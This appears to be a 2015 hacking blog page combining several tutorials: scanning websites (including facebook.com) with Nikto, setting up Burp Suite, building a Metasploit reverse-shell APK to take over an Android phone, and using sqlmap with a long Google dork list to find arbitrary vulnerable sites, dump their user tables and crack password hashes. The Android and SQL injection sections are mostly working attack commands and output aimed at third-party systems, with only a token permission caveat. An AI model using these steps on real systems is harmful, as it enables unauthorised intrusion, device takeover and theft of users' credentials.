Friday, May 29, 2015

Find Vulnerabilities for Any Website Using Nikto

Nikto


There are a number of tools and applications to find vulnerabilities in websites, but one of the simplest (and one of my favorites) is nikto.

This small and simple tool examines a website and reports back to you the potential vulnerabilities that it found that you could use to exploit or hack the site. In addition, it's one of the most widely used website vulnerabilities tools in the industry and in many circles considered the industry standard.

Although this tool is extremely useful and effective, it is NOT stealthy. Any website with an IDS or other security measures in place will detect that you are scanning it. Originally designed for security testing, it was never meant to be stealthy.

Step 1: Fire Up Kali & Open Nikto


Let's fire up Kali and get started with nikto. Once we have Kali up and running, go to Kali Linux -> Vulnerability Analysis -> Misc Scanners ->nikto, like in the screenshot below.


Although there are many options in using nikto, we will limit ourselves here to the basic syntax, such as this:

nikto -h <IP or hostname>


Step 2: Scan the Web Server


Let's start with a safe web server on our own network. In this case, I have started the http service on another machine on my network. There is not a website hosted by this machine, just the web server. Let's scan it for vulnerabilities by typing:


nikto -h 192.168.1.104
Nikto responds with a lot of information, as you can see below.



First, it tells us the server is Apache 2.2.14, probably on Ubuntu. It nailed this info and gives up more information on other potential vulnerabilities on this web server.

Note near the bottom that it identifies some vulnerabilities with the OSVDB prefix. 

This is the Open Source Vulnerability Database. This is a database maintained of known vulnerabilities atwww.osvdb.org, in addition to other databases I covered, such as SecurityFocus and Microsoft's Technet.



3: Scan the Site


Let's see what nikto can tell us about this site.

nikto -h webscantest.com



Once again, it identifies the server (Apache) and then proceeds to identify numerous potential vulnerabilities pre-fixed with OSVDB. 

We can take a look at that website at www.osvdb.org to learn more about these vulnerabilities.



Now, let's use this site to find information on one of the vulnerabilities identified by nikto as  OSVDB-877. We can put that reference number into the search function and it retrieves the following page.



Note, in lower half of this page there are cross-references to the various information sources about this vulnerability, as well as references to tools and filters such as Nikto, Nessus, and Snort.





Scan Facebook


Finally, lets point nikto at www.facebook.com.

nikto -h facebook.com



As you can see, Facebook is tightly secured with few vulnerabilities. As you can imagine, if Facebook weren't secure, every script-kiddie on the planet would be hacking it to see who his true love is chatting with online.
Posted by at No comments:

Setting Up BurpSuite Web Hacking Tool with Firefox and FoxyProxy


Burp Suite is an integration of various tools put together for performing security testing of Web applications. Burp Suite helps the penetration tester in the entire testing process from the mapping phase through to identifying vulnerabilities and exploiting them. This Burp Suite guide will help you to download and sett up BurpSuite web hacking tool with Firefox and FoxyProxy.

Web application vulnerabilities offer a large amount of risk to enterprise systems. Many web application vulnerabilities are a result of lack of input sanitization to the web application. In short, web applications leverage some form of input from the user and may process that information to serve content on the web application, or retrieve data from other parts of the system. If input isn’t properly sanitized, an attacker can send in an non-standard input to misuse the web application. 

In an effort to share techniques and knowledge learned over our time in the application security field, we'll be doing a series of blog posts on introducing people to Burp Suite. This first post will be an overview of how to get started with Burp and a browser for testing. We'll continue this series with other topics related to getting started in application security and testing web applications with Burp. Enjoy!


Everyone has their favorite security tools, but when it comes to mobile and web applications I’ve always found myself looking BurpSuite square in the eye. It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I’m just going to go through the installation to paint a good picture of how to get it up quickly.


BurpSuite is freely available with everything you need to get started and when you’re ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I’ll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we’ll get into that a little later.



Requirements and assumptions:

Mozilla Firefox 3.1 or Later
Knowledge of Firefox Add-ons and installation
The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.html and make a note of where you save it.

Install the FoxyProxy Standard add-on for Firefox from https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

Navigate to the directory you’ve downloaded BurpSuite to and double click the burpsuite_free_vx.x.jar file, in this example the file should be burpsuite_free_v1.5.jar
If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait. Soon you’ll see the loading splash screen followed by the program

                  



BurpSuite is a proxy, which means that you’ll be forwarding all of the web traffic from your browser through BurpSuite so that you can see each HTTP Request and Response and manipulate it to your heart’s content. First, let’s configure this thing.

 Click on the Proxy tab located on the top row, and then click the options tab just below in the second row.


You’ll notice all of the proxy settings available here, but there’s a few we want to focus on to get started. First, Look at the Proxy Listener section and make sure that the checkbox under the “Running”  column is selected and that the interface reads 127.0.0.1:8080


Next, make sure that the checkboxes for “Intercept requests based on the following rules” and “Intercept Responses based on the following rules” are checked in the following sections.




This will ensure that you capture both HTTP Requests you send and the Responses from the server.
Now, let’s head into firefox and configure FoxyProxy to route traffic through Burp for analysis. Open up Firefox, and note the FoxyProxy icon next to the address bar.


         Left click on the icon to open the configuration screen.

   Your default screen will look something like this



We will want to add a new proxy by clicking the “Add New Proxy” button. This will open up a window and pop you right on the Proxy Details screen with the Radio button “Manual Proxy Configuration” Selected. This is exactly what we want.  All we have to do here is fill in the same settings we placed in Burpsuite. IP address equal to “127.0.0.1” and Port equal to “8080”



Next head over to the “General Tab” at the top and fill in the details. It’s best to call it something you recognize, like “BurpSuite”


Go ahead and click OK and now we can start using our proxy.

Once you save you may see a notice that you haven’t enabled any whitelisted URL patterns. This is one of the features in FoxyProxy that will allow you to use multiple proxy services based on specific URL patterns. We won’t get into that in this guide, so for now just ignore the message for the time being and click “Yes”.
You’ll now see your newly added Proxy on the list. Make sure the enabled column is checked and click close
Now, remember that icon from earlier next to the address bar? If you right click, you’ll be able to select “Use proxy BurpSuite for all URLs”. Make sure Burp is running and visit any website you like. We’ll go to Google for now, so just type http://www.google.com into the address bar and click Go. If it appears that Firefox is taking forever to connect, it’s likely because burp is capturing the request, if not, you may have to enable intercepting in Burp, so let’s go over that now.

Go to BurpSuite and select “Proxy” on the top row of tabs, and “Intercept” in the second row of tabs, both highlighted orange here.



You will notice that my request to Google has been captured by BurpSuite. If you don’t see this you want to make sure that the “Intercept is On” button appears as circled in orange. If it’s set to “Intercept is off” your traffic is likely going through Burp but you’re not watching each request.

Moving forward, you can click the “Forward” button and look at each request and response as it comes through. You will see a blank white screen if there are no more requests or responses to pass.

If we head back to the browser you may see this message if you’re using Google over HTTPS.


You can add an exception everytime this happens when you’re using a proxy, but that can get a little annoying. We can also set Firefox to trust the burp certificate so that we don’t get this error.

The Professional version of burp allows us to get the certificate pretty easily, but in the free version we have to do a little work.

Since we're already on a page using HTTPS we can click "Add Exception...". If you navigated away from the page, simply visit any https enabled website and go from there.




Next you'll see the add exception screen which will allow us to view the certificate. Go ahead and click the View... button.



Here, you'll see that you have a certificate your browser is warning you about. Since we know that the Portswigger CA is us, we can go ahead and install this into Firefox, but in order to do this we'll need to export the certificate and note the location. Some important things to note here:

Make sure you select "PortSwigger CA" under the details of the certificate viewer before clicking export.


Make sure you save as the X.509 .crt, .pem file tye.


Click Save, and note the location.

We have to make sure this certificate is installed in Firefox. Accomplishing this is as easy as going into the options of Firefox and selecting "View Certificates" under "Advanced" in the Firefox Options pane.


On the next screen we just want to select import.


Select the certificate you exported earlier from the noted location and click OK. You will be prompted to select the type of trust for the certificate. You'll want to select "Trust this CA to identify websites"


If done correctly you should be able to find the "Portswigger CA" Certificate name under the "Authorities" tab.


Now, you should be able to navigate to any SSL site in burp without being prompted to trust the certificate. 

The next tweak we want to make is to disable Google Safebrowsing. Safebrowsing is obviously enabled for a reason but it can cause unwanted traffic during tests so we will disable it. 




  • Firefox button > Options > Options (or Tools > Options) > Security

And unchecking both "Block Reported attack sites" and "Block reported web forgeries".




I certainly hope this guide has been helpful in getting you up and running easily with BurpSuite. We'll be posting some additional tidbits in the near future on using Burp effectively.
Posted by at No comments:

Hack Android Remotely Using Kali Linux




 Let's start,

 Creating a booby trapped APK file


Now we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R >app.apk

(Replace the highlighted part with your Kali Linux IP address in for the LHOST address and forwarded port in for theLPORT address.)



The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it.

Once this is run, a file called “app.apk” will be created:




2. Now just send this file to your Android device, I used a Smart Phone in this instance.

3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener:

user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444

Then just type exploit to start the handler:




6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit system you should see this:




An active session is created and it drops you automatically into a meterpreter prompt.

8. From here your can type “sysinfo” to get information on the device:



9. You can see the processes running by typing, “ps”:


You are done!

Now you can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing “help” at a meterpreter prompt will list all the command that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:
meterpreter > shell
Process 1 created.
Channel 1 created.
ls

The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…
Posted by at No comments:

Thursday, May 28, 2015

Use SQLMAP SQL Injection to hack a website and database in Kali Linux

Use SQLMAP SQL Injection to hack a website and database in Kali Linux

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL databases. In this guide I will show you how to SQLMAP SQL Injection on Kali Linux to hack a website (more specifically Database) and extract usernames and passwords on Kali Linux.
use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-10


What is SQLMAP

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

  1. Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  2. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
  3. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  4. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  5. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  6. Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
  7. Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
  8. Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  9. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  10. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  11. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.
[Source: www.sqlmap.org]
Be considerate to the user who spends time and effort to put up a website and possibly depends on it to make his days end. Your actions might impact someone is a way you never wished for. I think I can’t make it anymore clearer.
So here goes:

Step 1: Find a Vulnerable Website

This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results.

Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website

This list a really long.. Took me a long time to collect them. If you know SQL, then you can add more here.. Put them in comment section and I will add them here.

Google Dork string Column 1Google Dork string Column 2Google Dork string Column 3
inurl:item_id=inurl:review.php?id=inurl:hosting_info.php?id=
inurl:newsid=inurl:iniziativa.php?in=inurl:gallery.php?id=
inurl:trainers.php?id=inurl:curriculum.php?id=inurl:rub.php?idr=
inurl:news-full.php?id=inurl:labels.php?id=inurl:view_faq.php?id=
inurl:news_display.php?getid=inurl:story.php?id=inurl:artikelinfo.php?id=
inurl:index2.php?option=inurl:look.php?ID=inurl:detail.php?ID=
inurl:readnews.php?id=inurl:newsone.php?id=inurl:index.php?=
inurl:top10.php?cat=inurl:aboutbook.php?id=inurl:profile_view.php?id=
inurl:newsone.php?id=inurl:material.php?id=inurl:category.php?id=
inurl:event.php?id=inurl:opinions.php?id=inurl:publications.php?id=
inurl:product-item.php?id=inurl:announce.php?id=inurl:fellows.php?id=
inurl:sql.php?id=inurl:rub.php?idr=inurl:downloads_info.php?id=
inurl:index.php?catid=inurl:galeri_info.php?l=inurl:prod_info.php?id=
inurl:news.php?catid=inurl:tekst.php?idt=inurl:shop.php?do=part&id=
inurl:index.php?id=inurl:newscat.php?id=inurl:productinfo.php?id=
inurl:news.php?id=inurl:newsticker_info.php?idn=inurl:collectionitem.php?id=
inurl:index.php?id=inurl:rubrika.php?idr=inurl:band_info.php?id=
inurl:trainers.php?id=inurl:rubp.php?idr=inurl:product.php?id=
inurl:buy.php?category=inurl:offer.php?idf=inurl:releases.php?id=
inurl:article.php?ID=inurl:art.php?idm=inurl:ray.php?id=
inurl:play_old.php?id=inurl:title.php?id=inurl:produit.php?id=
inurl:declaration_more.php?decl_id=inurl:news_view.php?id=inurl:pop.php?id=
inurl:pageid=inurl:select_biblio.php?id=inurl:shopping.php?id=
inurl:games.php?id=inurl:humor.php?id=inurl:productdetail.php?id=
inurl:page.php?file=inurl:aboutbook.php?id=inurl:post.php?id=
inurl:newsDetail.php?id=inurl:ogl_inet.php?ogl_id=inurl:viewshowdetail.php?id=
inurl:gallery.php?id=inurl:fiche_spectacle.php?id=inurl:clubpage.php?id=
inurl:article.php?id=inurl:communique_detail.php?id=inurl:memberInfo.php?id=
inurl:show.php?id=inurl:sem.php3?id=inurl:section.php?id=
inurl:staff_id=inurl:kategorie.php4?id=inurl:theme.php?id=
inurl:newsitem.php?num=inurl:news.php?id=inurl:page.php?id=
inurl:readnews.php?id=inurl:index.php?id=inurl:shredder-categories.php?id=
inurl:top10.php?cat=inurl:faq2.php?id=inurl:tradeCategory.php?id=
inurl:historialeer.php?num=inurl:show_an.php?id=inurl:product_ranges_view.php?ID=
inurl:reagir.php?num=inurl:preview.php?id=inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num=inurl:loadpsb.php?id=inurl:transcript.php?id=
inurl:forum_bds.php?num=inurl:opinions.php?id=inurl:channel_id=
inurl:game.php?id=inurl:spr.php?id=inurl:aboutbook.php?id=
inurl:view_product.php?id=inurl:pages.php?id=inurl:preview.php?id=
inurl:newsone.php?id=inurl:announce.php?id=inurl:loadpsb.php?id=
inurl:sw_comment.php?id=inurl:clanek.php4?id=inurl:pages.php?id=
inurl:news.php?id=inurl:participant.php?id=
inurl:avd_start.php?avd=inurl:download.php?id=
inurl:event.php?id=inurl:main.php?id=
inurl:product-item.php?id=inurl:review.php?id=
inurl:sql.php?id=inurl:chappies.php?id=
inurl:material.php?id=inurl:read.php?id=
inurl:clanek.php4?id=inurl:prod_detail.php?id=
inurl:announce.php?id=inurl:viewphoto.php?id=
inurl:chappies.php?id=inurl:article.php?id=
inurl:read.php?id=inurl:person.php?id=
inurl:viewapp.php?id=inurl:productinfo.php?id=
inurl:viewphoto.php?id=inurl:showimg.php?id=
inurl:rub.php?idr=inurl:view.php?id=
inurl:galeri_info.php?l=inurl:website.php?id=

Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection

For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.
Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quotation mark at the end of the URL. (Just to ensure, is a double quotation mark and is a single quotation mark).
So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page.
See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.
use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-1
Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server

Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.
Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.

MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12

Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near “‘’’”

Step 2: List DBMS databases using SQLMAP SQL Injection

As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.

Run the following command on your vulnerable website with.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15″)
--dbs = Enumerate DBMS databases
See screenshot below.
use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-2

This commands reveals quite a few interesting info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two database that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be on sqldummywebsite database.

Step 3: List tables of target database using SQLMAP SQL Injection

Now we need to know how many tables this sqldummywebsite database got and what are their names. To find out that information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database got 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-3
and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table probably contains username and passwords.

Step 4: List columns on target table of selected database using SQLMAP SQL Injection

Now we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from target table user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

AHA! This is exactly what we are looking for … target table user_login and user_password .
use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-4

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

SQLMAP SQL Injection makes is Easy! Just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes
use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-5

Almost there, we now only need the password to for this user.. Next shows just that..

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

TADA!! We have password.
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-6

But hang on, this password looks funny. This can’t be someone’s password.. Someone who leaves their website vulnerable like that just can’t have a password like that.
That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it.
I have covered how to decrypt password extensively on this Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux post. If you’ve missed it, you’re missing out a lot.

I will cover it in short here but you should really learn how to use hashcat.

Step 7: Cracking password

So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that?

Step 7.a: Identify Hash type

Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:
hash-identifier

use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-7
Excellent. So this is DES(Unix) hash.

Step 7.b: Crack HASH using cudahashcat

First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES

use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-8
So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.
I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around.
I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-9
Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). Howeverm both cudaHashcat and oclHashcat found and cracked the key.
Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.

Conclusion

Thanks for reading and visiting my website.
There’s many other ways to get into a Database or obtain user information. You should practice such techniques on websites that you have permission to.
Please share and let everyone know how to test their websites using this technique.

Posted by at No comments:
Labels:
Subscribe to: Posts (Atom)